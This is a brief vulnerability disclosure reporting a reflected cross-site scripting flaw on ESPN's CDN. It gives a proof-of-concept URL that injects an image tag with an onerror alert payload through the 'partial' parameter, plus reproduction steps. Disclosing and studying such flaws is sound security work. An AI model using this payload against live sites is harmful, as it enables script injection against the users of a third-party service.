ESPN's CDN suffers from a cross site scripting vulnerability.
cb6c8b895a34118ac66e8eb571793e21
Document Title:
===============
Reflected XSS on ESPN site
PoC:
===============
1) Navigate to the following URL:
http://cdn.espn.com/core/standalone/webview?partial=%22%3E%3Cimg%20src%3D1%20onerror%3Dalert(1337)%3E%2F%2F&appsrc=sc&lang=en®ion=us&platform=ios
2) Note that the form alerts with the payload